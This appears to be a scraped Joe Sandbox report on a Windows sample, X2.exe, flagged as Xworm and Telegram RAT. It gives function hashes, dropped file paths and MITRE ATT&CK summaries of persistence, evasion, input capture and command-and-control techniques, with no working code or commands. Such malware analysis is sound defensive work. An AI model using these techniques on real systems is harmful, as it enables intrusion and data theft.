Opcode ID: 48219211a421f49db3f85f3a4d90cf89324ffeada2feff5033bfc865936a5ce3
Instruction ID: 7928e7cf122ce492cd9c8bcb387272c2075a58deafc7d12e902671c40dba16c8
Opcode Fuzzy Hash: 48219211a421f49db3f85f3a4d90cf89324ffeada2feff5033bfc865936a5ce3
Instruction Fuzzy Hash: 4BE02013E0C9154BE740A618A441CBD77D1D7C4390B48046CF85DD72E1EC2CFA4147C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E311ED9 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2492932429.00007FFE7E310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffe7e310000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 404fbaffe36685fe17a297f858e70acd590919936518ed16f5715e445b086e8f
Instruction ID: a96c350b3c045ebf8a2b4b306e669f4d7c7f361c2b6b898104af07c7d2460af1
Opcode Fuzzy Hash: 404fbaffe36685fe17a297f858e70acd590919936518ed16f5715e445b086e8f
Instruction Fuzzy Hash: 0CC08016B1ED1E1DB361955C5C545FC03C6D7C41D67900439602DC72B3FD144C0B0190

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E310BE9 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2492932429.00007FFE7E310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffe7e310000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c244a43e63aa25d56dc08c07b89f13eebeeee811ba5058ef30ca019428f2da3b
Instruction ID: c7a47c1f2c9a70ef338e80b7141da85d93361ef695036c73a8e4c5619e49709f
Opcode Fuzzy Hash: c244a43e63aa25d56dc08c07b89f13eebeeee811ba5058ef30ca019428f2da3b
Instruction Fuzzy Hash: E2D0C921B54A494BAB88A278115D67C62D3EF98685318403AD80AE3A92EE289C530740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E311248 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2492932429.00007FFE7E310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffe7e310000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a4576bd91074ec89a07f85ef777ef2118dc3a820447c2b065860445571fc7b7
Instruction ID: 6a60ae307b56e94e402b25ad99887adb532cb024f78225b2cf842ec337de478c
Opcode Fuzzy Hash: 6a4576bd91074ec89a07f85ef777ef2118dc3a820447c2b065860445571fc7b7
Instruction Fuzzy Hash: 1CC01225D2481E8FD758E754C8506BFB672FF84200F5004399019D72E1CE342C008740

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report X2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: Telegram RAT

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0pfdzrbz.hmr.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1twhqbul.0cj.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ykowicr.nig.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5a3xxvqq.fu3.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5nbalah.m0p.psm1

Windows Analysis Report
X2.exe

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre